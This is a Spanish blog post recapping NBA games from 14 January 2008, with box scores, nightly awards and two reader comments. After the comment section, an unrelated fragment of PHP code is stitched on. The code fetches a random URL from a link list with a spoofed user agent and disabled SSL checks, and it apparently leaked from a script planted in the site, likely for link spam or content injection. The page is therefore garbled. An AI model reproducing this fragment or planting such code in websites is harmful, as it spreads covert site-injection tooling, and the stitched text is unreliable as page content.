La crónica (14/01/08)

15 de January de 2008 por MagicJohnson32

 

Noche de emociones, de grandes actuaciones individuales y de contrastes. Hubo tres partidos con anotaciones conjuntas por encima de los 235 puntos, y en cambio en los cuatro restantes ningún equipo alcanzó los 100. Sin embargo, el titular del día es que por primera vez los Celtics 07-08 han perdido dos partidos de forma consecutiva, ambos a manos de Butler, Jamison y los sorprendentes Wizards. En Charlotte, un Gerald Wallace inconmensurable, que incluso empieza a anotar de 3 con cierta facilidad, llevó a su equipo al triunfo ante los Nuggets pese a las espectaculares estadísticas de Camby (20 puntos, 23 rebotes, 6 asistencias y 6 tapones). En New Jersey, los locales vieron como los Blazers les dominaban de principio a fin y desactivaban a sus tres estrellas: ni Kidd ni Carter ni Jefferson pasaron de los 10 puntos. Los Spurs se apuntaron ante los Sixers uno de sus característicos triunfos, controlando a los rivales más peligrosos, caso de un Andre Miller al que dejaron en 6 puntos y 4 asistencias. La gran actuación de Bogut en Salt Lake City no sirvió de nada ante la pareja local, Deron & Boozer, que se combinaron para 54 puntos, 15 rebotes y 13 asistencias. Y en California, Salmons y Martin lograron para los Kings un triunfo ante los Mavs que, de paso, y gracias a los 48 puntos con canasta ganadora incluida de Kobe Bryant en pista de los Sonics, pone a los Lakers como líderes del Oeste.

Seguimos con los resultados y box-scores de la pasada noche:

Nuggets 116 – 119 Bobcats

Wizards 88 – 83 Celtics

Blazers 99 – 73 Nets

Sixers 82 – 89 Spurs

Bucks 87 – 98 Jazz

Lakers 123 – 121 Sonics

Mavs 120 – 122 Kings

cambyvsbobcats

Nuestro MVP: Como cada día varios jugadores se hacen acreedores del preciado galardón. Los 48 puntos y canasta de la victoria de Kobe Bryant, los 33 puntos y 10 asistencias de Deron Williams, los 40 puntos, 8 rebotes y 5 asistencias de Gerald Wallace o los 35 puntos y 7 rebotes de Carmelo Anthony. Pero si hoy hay una actuación realmente destacada esa es los 20 puntos, 23 rebotes, 6 asistencias y 6 tapones de Marcus Camby. Lástima que semejante exhibición no sirviera para dar la victoria a su equipo.

El rookie de la noche: Pasa desapercibido la mayoría de los partidos al lado de su compañero de equipo y promoción, Kevin Durant, pero Jeff Green demuestra en cada partido que es un jugador que puede aportar en varios aspectos del juego. Hoy, frente al 6 de 26, 1 rebote y 1 asistencia que ha hecho Durant, él ha cerrado el partido con 14 puntos, 7 rebotes y 3 asistencias.

kevmartindallasLa sorpresa de la noche: Kevin Martin ha vuelto como un tiro de su lesión producida el pasado 4 de diciembre. Si hace dos días, saliendo desde el banco ya acabó con 25 puntos, esta vez se ha ido a los 39, con tan sólo 2 fallos en 16 intentos. Resulta increíble que alguien vuelva de una lesión a semejante nivel.

La decepción: Horrible partido el protagonizado por los New Jersey Nets esta madrugada, encuentro en el que únicamente han sido capaces de anotar 73 puntos. Sin ir más lejos, entre Vince Carter y Richard Jefferson habían conseguido sólo 5 puntos al término de la primera parte. Al final 19 puntos entre los 2, con un 4 de 20 en tiros de campo, datos que hacen imposible decidir entre uno de los dos para la decepción del día.

Acabamos con la canasta que ha dado el triunfo a los Lakers en el KeyArena y ha situado a los angelinos en cabeza de la Conferencia Oeste.

Comenta

2 comentarios a esta entrada

  1. RusticoColorao dice:
    #1

    Vaya manipulador que estás hecho…casualmente sale la canasta ganadora de Kobe hoy

      Citar

  2. MagicJohnson32 dice:
    #2

    Iba a poner la canasta ganadora de los Bulls, pero no la he encontrado :p)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>